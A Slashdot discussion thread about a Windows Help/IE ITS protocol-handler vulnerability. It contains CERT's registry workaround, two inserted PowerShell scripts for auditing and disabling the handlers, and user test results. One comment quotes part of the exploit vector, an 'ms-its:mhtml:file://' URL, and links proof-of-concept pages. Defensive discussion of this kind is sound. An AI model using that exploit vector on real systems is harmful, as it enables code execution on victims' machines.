New Windows Vulnerability in Help System
wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."
...but Linux needs to get its act together.
/tmp or the installer will dump core. After the installer is done, edit /etc/X11/XF86Config and add a section called "GL" and put "driver nv" in it. Make sure you have the latest version of X and Linux kernel 2.6 or else X will segfault when you start. OK, run the Quake 3 installer and make sure you set the proper group and setuid permissions on quake3.bin. If you want sound, look here [link to another obscure web site], which is a short HOWTO on how to get sound in Quake 3. That's all there is to it!"
Linux is *not* user friendly, and until it is, Linux will stay with >1% market share.
Take installation. Linux zealots are now saying "oh installing is so easy, just do apt-get install package or emerge package": Yes, because typing in "apt-get" or "emerge" makes so much more sense to new users than double-clicking an icon that says "setup".
Linux zealots are far too forgiving when judging the difficulty of Linux configuration issues and far too harsh when judging the difficulty of Windows configuration issues. Example comments:
User: "How do I get Quake 3 to run in Linux?"
Zealot: "Oh that's easy! If you have Redhat, you have to download quake_3_rh_8_i686_010203_glibc.bin, then do chmod +x on the file. Then you have to su to root, make sure you type export LD_ASSUME_KERNEL=2.2.5 but ONLY if you have that latest libc6 installed. If you don't, don't set that environment variable or the installer will dump core. Before you run the installer, make sure you have the GL drivers for X installed. Get them at [some obscure web address], chmod +x the binary, then run it, but make sure you have at least 10MB free in
User: "How do I get Quake 3 to run in Windows?"
Zealot: "Oh God, I had to install Quake 3 in Windoze for some lamer friend of mine! God, what a fucking mess! I put in the CD and it took about 3 minutes to copy everything, and then I had to reboot the fucking computer! Jesus Christ! What a retarded operating system!"
So, I guess the point I'm trying to make is that what seems easy and natural to Linux geeks is definitely not what regular people consider easy and natural. Hence, the preference towards Windows.
Microsoft is in some serious need of some help on this...
I am sure the major virus scanners will have it before anything "really" bad happens... this isn't anything special... move along.
"could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.
Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.
> and no virus definitions for the major scanners
Jesus, even my ScanJet is vulnerable?
Most of us here have already modified our systems, knowing that having even the IE exe file or Outlook Express exe file could cause problems, and have removed it (even in spite of the hidden little annoying backup). Remember, to get rid of IE, be sure to look in the folder /windows/system32/dllcache for those backup exe files that it uses to restore when you try and rip IE or Outlook out yourself.
They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC exploits here on Slashdot for people to check for themselves. ... what took them so long?
Jelmer's PoC is good: link
(That page is the info page, you won't get hit by clicking on the link directly)
it's in my head
now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the forrester research published last week. rd
I think MS will fix this one soon because of its impact on the Windows concept as a whole. The help system is a crucial item.
Well, CERT says to disable ActiveX stuff; well, that should be easy to fix, I guess.
Hope they fix this one soon.
but besides companies and organizations, I think most of the Joe Average Windows users don't take the trouble of configuring their system with restricted users and such. (Personally I find it hard to get it all configured right; for one, how do I allow restricted users to define shares??)
"By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could execute script in a different security domain than the one containing the attacker's document." => let's hope outlook blocks scripts or lots of people will be an easy prey thanks to the 'great' preview pane!
I don't think this will be MSBlast 2, but I do hope the antivirus programs will catch up (which they undoubtedly will).
long live mozilla!
I'm a man, therefore I use MAN pages when I need help. ;)
- A
IE's exe file is not very relevant, as it is only a loader for the DLLs that implement the actual functionality.
How else could it be so small?
To really get rid of IE you need to remove the DLL files that it uses, and you will break many other programs in the process, because they all closely link to each other.
If the Windows help thing can be disabled or uninstalled, maybe that exploit won't have anything to exploit.
I don't run Windows, so I don't know much about the help system in it, but what I do know is that the help it gave me was about as useful as fine bone china in a tea party for drunken Parkinson disease sufferers, so uninstalling/disabling it won't be a great loss.
"A door is what a dog is perpetually on the wrong side of" - Ogden Nash
mshtml.dll for one. Oh and hope that explorer is not broken in the process.
I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.
----- One learns to itch where one can scratch.
Can anyone explain to me how Mozilla can invoke IE without me explicitly permitting it, and if there are any settings for Mozilla to prevent it?
Remember to backup your registry (or at least this portion of it)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
From the CERT article:
Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Disable ITS protocol handlers
Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\its
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-its
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\ms-itss
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\mk
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.
Disable Active scripting and ActiveX controls
NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
Does this require exterminating IE completely off the machine to fix ?
We had the release of a "conceptual" Trojan yesterday.... but not a real virus.
Some software company was trying to sell their mac virus software. A real ID3 tag Mac Trojan does not exist right now.... and odds are we will see patches before one comes to be.
"Things are more moderner than before- bigger, and yet smaller- it's computers-- San Dimas High School football RULES!"
Follow the link, read the report, then come back and tell us why this might be important.
The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".
There is a proof of concept page here. Neither Mozilla nor Firefox are susceptible.
I couldn't care less whether you are modded up as insightful or modded down as troll (and I know which I'd do). /. quite frequently reports on vulnerabilities in free & open source software - and of course these articles receive a bunch of trollish replies along the lines of "who cares" and "why's this news".
Trojan viruses have been in the wild for at least a week, probably more. You get infected by visiting a website (with IE, of course) and then it spams URLs of the trojan via mIRC. The process is something like wsz32.exe or nosc32.exe (in %windir%\system32\).
... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.
Well, how secure is GNU/Linux then???
...
Most programmers are sloppy, hence they leave buffer-exploitable code in their releases and other stuff too.
From a security standpoint, GNU/Linux is less safe than Micro-soft stuff, but Micro-soft blows its own advantage by releasing their software too early, which of course contains bugs.
This is not flamebait; I'm just a computer engineer who happens to be concerned about security, and right now there is no secure product at all.
At the risk of replying to a Microsoft troll, this is not a "pretty insignificant" story.
Errors in server-side applications are rapidly fixed by serious system administrators and at the worst they provide attackers a way into unprotected systems. How many computers around the world are currently infected or zombied thanks to holes in any of the programs you cited? Almost zero.
Security holes in client-side applications (MSIE, Outlook, primarily) are a totally different story. These programs are mainly used by people who don't have the capacity to protect their systems. And the results are clear: millions of PCs infected by everything from viruses to worms and spywares, used as platforms to launch DDoS attacks, to send spam, to steal information...
There is a real security problem on the Internet, one that is making a joke of the "information highway", and it's almost entirely caused by vulnerabilities like the one reported here.
Until the market leader realizes that its users need serious protection from the malicious forces who roam the Internet, no amount of criticism is too much. And, if you really want to support and defend Microsoft, you should be adding your voice, because it is this issue - its failure to provide its users with a safe platform - which will be its downfall.
"Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.
This is not a signature
I don't know anything that can be really disabled or uninstalled on Windows. Since it's already mentioned that IE is the default handler for help files, I guess people are out of luck in this regard.
I once wanted to uninstall the games that come preinstalled with Windows. So, I got the relevant registry tweaks from support.microsoft.com to have the games displayed in the "Windows Add/Remove Programs" section. Great! Guess what happened? The shortcuts were removed, and the exe files left in place. That's apparently what Microsoft considers uninstalling to be.
What would an EWOULDBLOCK block, if an EWOULDBLOCK could block would? -- me
Are you sure?
I loaded up IE, went Help... Contents and Index... Search... and typed in "help subsystem vulnerable" and hit List Topics.
a pop up box announced "no topics found"
so what is everyone talking about? this doesn't seem to be a problem
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
this is probably some kind of mean trick from mister Linus to discourage the use of Windows. I don't believe in this vulnera...
hey, where did my files go?
Save it as chm-disable.reg
Put a line like this in your logon script:
regedit
Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
Note: If you're still using batch files: KiXtart is your friend!
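The CERT workaround quoted above (rename or delete the ITS protocol handler keys, after saving them) and the chm-disable.reg logon-script approach in this comment both boil down to the same registry change. As an added example, not code from CERT or from any poster here, the PowerShell script below backs each handler key up with reg.exe export, renames it in place, and renames it back on restore; the four handler names (its, ms-its, ms-itss, mk) are taken from the thread, and the script assumes an elevated session.

```powershell
# Added example: audit, disable (rename) or restore the ITS protocol handlers.
# Not part of the CERT advisory or any comment on this page.
# Usage (elevated PowerShell):
#   .\Set-ItsHandlers.ps1 -Mode Audit
#   .\Set-ItsHandlers.ps1 -Mode Disable -BackupDir C:\backup\protocols
#   .\Set-ItsHandlers.ps1 -Mode Restore
[CmdletBinding()]
param(
    [Parameter(Mandatory)]
    [ValidateSet('Audit', 'Disable', 'Restore')]
    [string]$Mode,

    # reg.exe export copies of each key land here before anything is renamed.
    [string]$BackupDir = (Join-Path $env:ProgramData 'its-handler-backup')
)

$HandlerRoot = 'HKLM:\SOFTWARE\Classes\PROTOCOLS\Handler'
$Handlers    = @('its', 'ms-its', 'ms-itss', 'mk')   # names from the advisory
$Suffix      = '.disabled'   # a renamed key keeps its values, so restore is a rename back

function Get-HandlerState {
    # One object per handler: present, renamed or absent, plus the CLSID it points
    # at, so an unexpected handler registration stands out in the audit output.
    foreach ($name in $Handlers) {
        $live   = Join-Path $HandlerRoot $name
        $parked = Join-Path $HandlerRoot ($name + $Suffix)
        $state  = if (Test-Path $live) { 'present' }
                  elseif (Test-Path $parked) { 'renamed' }
                  else { 'absent' }
        $clsid  = $null
        if ($state -ne 'absent') {
            $path  = if ($state -eq 'present') { $live } else { $parked }
            $clsid = (Get-ItemProperty -Path $path -ErrorAction SilentlyContinue).CLSID
        }
        [pscustomobject]@{ Handler = $name; State = $state; CLSID = $clsid }
    }
}

function Backup-Handler([string]$name) {
    # reg.exe export writes a .reg file that 'regedit /s file.reg' reimports verbatim,
    # which is the same mechanism the logon-script comment relies on.
    New-Item -ItemType Directory -Path $BackupDir -Force | Out-Null
    $key  = "HKLM\SOFTWARE\Classes\PROTOCOLS\Handler\$name"
    $file = Join-Path $BackupDir "$name.reg"
    if (Test-Path $file) { Remove-Item -LiteralPath $file -Force }
    & reg.exe export $key $file | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "reg export failed for $key" }
    return $file
}

switch ($Mode) {
    'Audit' {
        Get-HandlerState | Format-Table -AutoSize
    }
    'Disable' {
        foreach ($h in Get-HandlerState) {
            if ($h.State -ne 'present') { Write-Verbose "$($h.Handler): $($h.State), skipping"; continue }
            $file = Backup-Handler $h.Handler
            # Rename rather than delete: the key and its CLSID survive for the restore step.
            Rename-Item -Path (Join-Path $HandlerRoot $h.Handler) -NewName ($h.Handler + $Suffix)
            Write-Output "$($h.Handler): backed up to $file and renamed"
        }
    }
    'Restore' {
        foreach ($h in Get-HandlerState) {
            if ($h.State -ne 'renamed') { Write-Verbose "$($h.Handler): $($h.State), skipping"; continue }
            Rename-Item -Path (Join-Path $HandlerRoot ($h.Handler + $Suffix)) -NewName $h.Handler
            Write-Output "$($h.Handler): restored"
        }
    }
}
```

Run Audit first on a test machine and check that the CLSID column shows the same handler on every box before rolling Disable out, since the advisory warns the change degrades Windows Help and must be undone once a tested patch is installed.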
What about pico?
What is the airspeed velocity of an unladen swallow?
African or European?
It seems that this is going to be an ugly one. I always already thought this IE thingy was an ugly one, even without this bug?
"I did this cuz Linux gives me a woody"
how to format my harddisk. Maybe Windows-help can provide me with some support. *clickety-click*
sig(h)
we haven't finished talking about the OS X security hole. Damn MS always has to get market dominance in everything they do...
The Mothership
you will be afraid too
and being afraid is a GOOD thing
it makes you vigilant
there is no system out there that is 100% virus proof
so don't make excuses to lull yourself into a false sense of security
always be vigilant, and you will minimize your risk of being infected
it will never be 0, no matter what os you use, no matter what you do
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
Yeah, you wish. If I knew what was wrong I couldn't fix it myself. Thanks, Bill!
NOTE: Using an alternate web browser may not mitigate this vulnerability. It may be possible for a web browser other than IE on a Windows system to invoke IE to handle ITS protocol URLs.
;)
Yeah, it's a bigger problem than just IE; another web browser or email client may end up doing you in. Best get off that Windows box.
anthony
I use a "custom level" for my internet zone. I basically turn off *everything*. I don't need java, and "active scripting" should be re-worded to say "give web pages access to God-knows-what?".
Besides, I really despise the "AppletTransition Sensor" that ESPN and other sites use. Screw `em. Just give me the dang HTML and, please, IE, just render it for me. No code, no scripts, no popups, no crap.
Websites that require JavaScript piss me off. The stupid Washington Post can't even render a page without JavaScript. What a turd.
Now, if only I could get IE to stop displaying the "Your browser doesn't allow ActiveX controls" message that pops up on pages where the designer used some crap control. I've made ActiveX controls and I *know* they can do anything they want on my system. Arg.
And wtf is with "install desktop items"? This is a *web* *browser*, not the control panel, for crying out loud.
And, last but not least, when I disable all this crap and then hit apply, it gives me a confirm warning message, but when I (because I need to use JavaScript on some crappy page) restore the default "cheap-whore-mode" settings, it doesn't say a word! Nice emphasis, Microsoft.
Yeah, I know, use a different browser (or OS), but we all know Windows is *designed* to not interoperate well with those things, right? Sometimes, it wastes time to try to fight inertia.
Anyhow, my feeling is that the desktop situation on Linux and BSD won't be solved until X is ditched completely. Just give me the dang screen buffer(s) and some basic routines and I'll draw my own shtuff. X is a 25-year-old turd, designed for machines with, like, 4k of memory (warning: hyperbole). Just give me font, line, point, ellipse, bitblt and friggin window data structures -- straight to the video card. And access to the video card regs would be nice too.
End of Rant, enjoy your day.
Peace & Blessings,
bmac
Where's my friggin points when I need them?
Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.
And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
...but Mr MS-Security himself said that there were NO exploits prior to the security patches !
Maybe we deserve this world ?
GNU/Linux is inherently more secure than Windows. Not least because GNU/Linux is a derivative of UNIX, which was designed from the bottom up to be a multi-user system. Permission-based security is a cornerstone feature of GNU/Linux, whereas Windows (being derived from DOS) can't implement a proper multi-user model for the sake of backward compatibility.
I'd argue this one. Vulnerabilities are only the result of more than a decade of totally irresponsible behaviour by Microsoft. More $$$, no matter what. That's the real cause.
"Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.
I think they will shiver not of fear, but of lust.
Don't fight for your country, if your country does not fight for you.
does anyone know where this exploit originated?
is it, perchance, related to the recent windows source code leak?
K.
What browsers do not invoke IE to handle ITS protocol URLs? If I use Mozilla for example, could I still be vulnerable to this security hole?
That's it! I'm buying a Mac!
"The more I use Windows, the more I love my Commodore 64"
If telephones are outlawed, then only outlaws will have telephones.
Games require you to have admin access to work, i.e. The Sims (god knows why).
That is for the copy protection to work properly.
God.
for MSFT to survive in the future will be open sourcing critical sections of the OS. I mean Windows XP is a huge piece of software; the real cost is in maintaining it, not necessarily production. Now imagine Longhorn and how much it tries to accomplish. I don't see MSFT being able to afford it single-handedly in the future. Especially if MSFT wants to position itself as a company that is selling software that is not only ubiquitous but secure as well.
Activists United
That's not the point. MS has tried to lead the public to believe that there's never been an instance of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the Witty worm spread before ISS had patches for their products.
On a related note, MS pretty much NEVER releases advisories of their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the Windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory, that would lead me to the possibility that the Windows source leak could be the source of this one.
Thanks, I always did rather wonder about that, of course getting rid of the exe file itself means that almost all of the programs that annoyingly try to call it up without my consent come up empty handed. So for me it was still worth it to tear out the exe files.
Why did you make it so bloody difficult to switch off HTML content in received email text? At best, it meant bandwidth-guzzling spam; at worst, viruses you didn't even have to open to catch..
As to browser/plug-in vulnerabilities, it may never be possible to eliminate them all, there are just too many niches for a virus to gain foothold.
"You lied to me! There is a Swansea!"
There you are, all your user friendliness rubbish, that Linux is ready for the desktop.
How would Joe Average, Jose Sixpack, Aunt Tillie, your Mom, my Mom, Grandma, Grandpa, the children, react if faced with such arcane, incomprehensible instructions?
In Windows everything is easy, In Windows everything is one click away.
You Linux zealots are the sux0r.
IANAL but write like a drunk one.
Are you happy now, or do we still need to educate you why modularity is a better design compromise?
MS's decision to embed IE into everything in Windows makes Windows a breeding ground for vulnerabilities.
IANAL but write like a drunk one.
I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.
s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm
.chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
---------
Windows XP Professional Service Pack 1
Mozilla Firebird 0.8 run as limited user: no apparent effect
Mozilla Firebird 0.8 run as administrator: no apparent effect
Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:
Line 47, Char: 5, Error: Write to file failed, Code: 0
URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.
Internet Explorer 6 run as administrator: demo exploit runs as expected
A software restriction policy is in place on this machine, forbidding the execution of any executable files (including
------------
Windows XP Professional Service Pack 2 RC 1
Internet Explorer 6 run as administrator: no apparent effect
Fixed in SP2?
---------------
One thing that concerns me about using this particular sample code as a test is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invulnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the Program Files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
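The poster's results above turn on a few account-level conditions: whether IE runs as administrator, whether the account can write under \Program Files or System32, whether a software restriction policy is in force, and (as a later comment notes) whether the "Help and Support" service is running. As an added example, not the poster's own test code, the PowerShell script below reports those conditions for the account that runs it; the ITS handler names and the service display name are taken from the thread, and the write checks work by creating and deleting an empty probe file.

```powershell
# Added example: report the exposure-relevant state of the current account.
# Not code from any comment on this page. Runs fine in a non-elevated session;
# run it once under each account you want to assess.

function Test-IsAdmin {
    # The sample exploit only had an effect when IE ran with administrator rights.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $p  = New-Object Security.Principal.WindowsPrincipal($id)
    return $p.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Test-WriteAccess([string]$dir) {
    # The sample relied on writing under \Program Files. Probe with a zero-byte
    # file that is removed again; any failure counts as "no write access".
    $probe = Join-Path $dir ('its-probe-' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]]@())
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-ItsHandlerNames {
    # Handler names from the CERT workaround quoted earlier in the thread.
    $root = 'HKLM:\SOFTWARE\Classes\PROTOCOLS\Handler'
    @('its', 'ms-its', 'ms-itss', 'mk') | Where-Object { Test-Path (Join-Path $root $_) }
}

function Get-HelpServiceState {
    # A later comment reports the service flipping itself back to Automatic when
    # Help is opened, so report both the current status and the start type.
    $svc = Get-Service -DisplayName 'Help and Support' -ErrorAction SilentlyContinue
    if (-not $svc) { return 'not installed' }
    $wmi = Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'" -ErrorAction SilentlyContinue
    return "$($svc.Status) / start type $($wmi.StartMode)"
}

function Get-SrpDefaultLevel {
    # Software Restriction Policies: DefaultLevel 0 = Disallowed, 0x40000 = Unrestricted.
    $srp = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers'
    $v = (Get-ItemProperty -Path $srp -ErrorAction SilentlyContinue).DefaultLevel
    if ($null -eq $v) { return 'no policy' }
    switch ($v) { 0 { 'Disallowed' } 0x40000 { 'Unrestricted' } default { "level $v" } }
}

$report = [ordered]@{
    'User'                          = [Security.Principal.WindowsIdentity]::GetCurrent().Name
    'Administrator'                 = Test-IsAdmin
    'Can write to Program Files'    = Test-WriteAccess $env:ProgramFiles
    'Can write to System32'         = Test-WriteAccess (Join-Path $env:SystemRoot 'System32')
    'ITS handlers still registered' = (Get-ItsHandlerNames) -join ', '
    'Help and Support service'      = Get-HelpServiceState
    'Software restriction default'  = Get-SrpDefaultLevel
}
[pscustomobject]$report | Format-List

# Reading the output against the poster's results: Administrator = True or either
# write check = True is the configuration in which the sample ran; an empty handler
# list means the ms-its: URL has nothing left to invoke.
```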
Windows XP sets up its users with full administrator privileges by default and without a password.
The simple Control Panel even hides the management interface to make granular security possible.
The truth is, in order for NT to work in consumer homes, it had to behave just like DOS versions of Windows did.
Joe Sixpack may be computer illiterate, but his dollar is what ultimately fills Microsoft's coffers.
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
never lull yourself into a false sense of security
that's when you'll get infected
because you'll find your blast doors have been infested with termites and your security system has been switched off somehow
be always vigilant
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
okay how is bill going to indemnify me on this one.
sure I can point the finger to microsoft but doesn't help very much when my computer is hosed.
I am so sick of hearing about indemnification used with the sco case. Why don't they talk about it now. Because it is an non issue - software companies aren't liable for anything. So why buy their crap software. I am sticking with open source at least they own up to their mistakes and fix them a hell of lot more quicker than Microsoft.
I don't know about that specific vulnerability, but I always suspected something fishy about the chm files. They can run JavaScript and whatever else you compile into them with full user privilege. Yes, I write chm files. I think a workaround is to disable JavaScript and other scripting at the Local Intranet security level in IE options.
Non-Linux Penguins ?
Isn't that an oxymoron? I was reading an interview the other day that Gates has shifted the company's #1 priority from Longhorn to security. This is another major blow for Microsoft. But, since when has the help menu actually ever been useful anyway?
Considering how seldom the idiot^H^H^H^H^H^H users actually use the help function where I work, it shouldn't be a problem. It seems they regard the IT Support "Help Desk" as their first place to look when they ought to be using the online Help function in that seemingly invisible menu at the right side of their window.
You see? You see? Your stupid minds! Stupid! Stupid!
Pardon me sir, i think it's spelled "loser"...
:)
And if they lost anything since then they'll learn not to click on that email that they were told not to.
And when they bitch, you can show them your Linux desktop and click on that "bad" email a bunch of times and say "It's all because Windows is soooo insecure..."
Count one more non-techie user who's just been moved a bit out of the Microsoft orbit!
My Apache logs are STILL full of Code Red / Nimda hits from IIS machines. The client/server divide is actually bullshit. Windows owes its dominance to making it easy for the technically inept to do the things they still do not understand how to do when they have clickety-clickety-done them. Fortunately MS can afford to pay me bandwidth costs for the deafening crescendo of background noise that virus/worm traffic is ramping towards. Bring on Palladium and stop these Windows-using cretins from ruining it for the rest of us.
So basically, then, that makes it so that if the user gets infected by something, all it can do is destroy that user's personal files...
I wonder...does anyone here keep their data in a separate account? I wonder how much safer/inconvenient that would be.
the new version of xpy has the (temporary?) feature to disable the chm file handling (for those who like it userfriendly or what it's called)
Ok. we can disable HTML in mozilla, but how we could protect someone from viewing html in a (free) webmail?
It seems that this is going to be an ugly one.
How about the report this morning on Linux being completely unacceptable for ANY secure purpose including defense, from the AP?
"Linux a national security risk" is the headline, I believe. Is that an ugly one, too?
"...I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network."
Aww, he's afraid. Stay off the Internet then. Problem solved. There will *always* be a risk of this as long as you connect to other networks, regardless of the operating systems in use.
Now if you do want to be on the Internet, do the following things, and maybe you won't be "constantly afraid" anymore. While not foolproof, these instructions will *greatly* reduce risks of the big bad boogeymen messing up your little home computer.
Step 1: Correctly Install Good Hardware Firewall
Step 2: Correctly Install Virus Scanner/Updates
Step 3: Correctly Install Spam Filtering Mechanism
Step 4: Don't be stupid and open stuff with attachments or download stupid crap
Step 5: Actually make Backups and test restoring them once in a while to make sure the backup works.
Step 6: Configure computers to automatically update with OS patches and virus scanner updates. Keep firmware on the firewall updated.
Step 7: Schedule appointment with psychologist to discuss your overwhelming panic and fear.
But try explaining that to my dad, who can't figure out what program he's sending e-mail from.
All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
Do the users where you work not have Internet or e-mail access? Then I guess you are safe.
The IT Support Help Desk? You're guaranteed to get a virus there!
Everyone keeps talking about a virus and trojan that will get into your PC with this exploit.
I would think adware spyware makers will be using this in their webpages to get some progs installed on your computer. They will have a lot of fun with this hole.
--Seth
I haven't added many yet, but it's a start.
Now, I just have to try to get manglement approval to add known spyware sites to the list as well...
Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.
Somewhere in Linux-land, a phone rings....
Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "
It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".
What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?
(20 minutes later)
OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.
OK, now type "make" OK, call me back when it is done.
(15 minutes later)
OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?
(10 minutes later)
Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.
No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.
OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!
My beliefs do not require that you agree with them.
a v'irus has been fo)und on Your"r sys:tem. Press F1 for mor'e in!format%ion.
The code was for IE5, this is very unlikely. And a patch is available, it's called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.
Is that all you have to do? I just stopped and disabled the "Help and Support" service in WinXP Home. But then when I try "Help and Support" from the Start menu, that service switches itself to Automatic and starts again! Of course I won't be opening H&S any time soon.. but if "disabled" doesn't mean much, will it stop a virus? Or just start itself back up again?
You want a sig? I can get you a sig... Hell, I can get you a sig by 3 o'clock this afternoon... with nail polish.
I love the smell of a Windows Vulnerability in the morning....smells like victory...
For Linux I mean.
IE hijackers are already employing these exploit methods to install ActiveX and browser helper objects onto IE, throwing popups everywhere.
If they open worm-propagating password-protected .zip attachments from unknown sources they'll open anything.
i think it's simply a matter of complexity
;-)
computers and software are getting more and more complex with each passing minute
play the statistics: it becomes inevitable, after a certain size level, that a given piece of software has at least one bug in it, somewhere, that can be exploited for wormlike/ viruslike behavior
you have faith in human engineering abilities, that is noble, but perhaps naive: humans have an infinite ability to screw something up without even realizing it, none of us are omniscient
and so: beware that false sense of security my friend, that will be your achilles heel more than windoze ever could be
and besides, you are forgetting the most error-prone piece of the equation which will always be the prime piece of failure when preventing any intrusion in any os, and can never be reengineered or routed around:
the end user
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
My girlfriend's a real cracker!
(She'd better not be a hacker. Now, where did I put that axe?)
geez, someone is drowning in hyperbole today... is there absolutely no validity or wisdom in the simple, straightforward concept: be always vigilant when it comes to computer security? ;-P
Have you RTFA? The vulnerability can be exploited by convincing the victim to view an HTML document or an email, no need to use the help system or anything.
RTFA here, and check out the exploit demo here, and then figure out that you didn't use the help system, and yet the exploit happened.
The IT section color scheme sucks.
Heh, I always felt vulnerable when using Windows help
I've always considered this to be CERT, not this.
Apparently our new Dept. of Homeland Security launched us-cert.gov as a partnership with Carnegie Mellon's cert.org (and others, in the future).
I feel safer already.
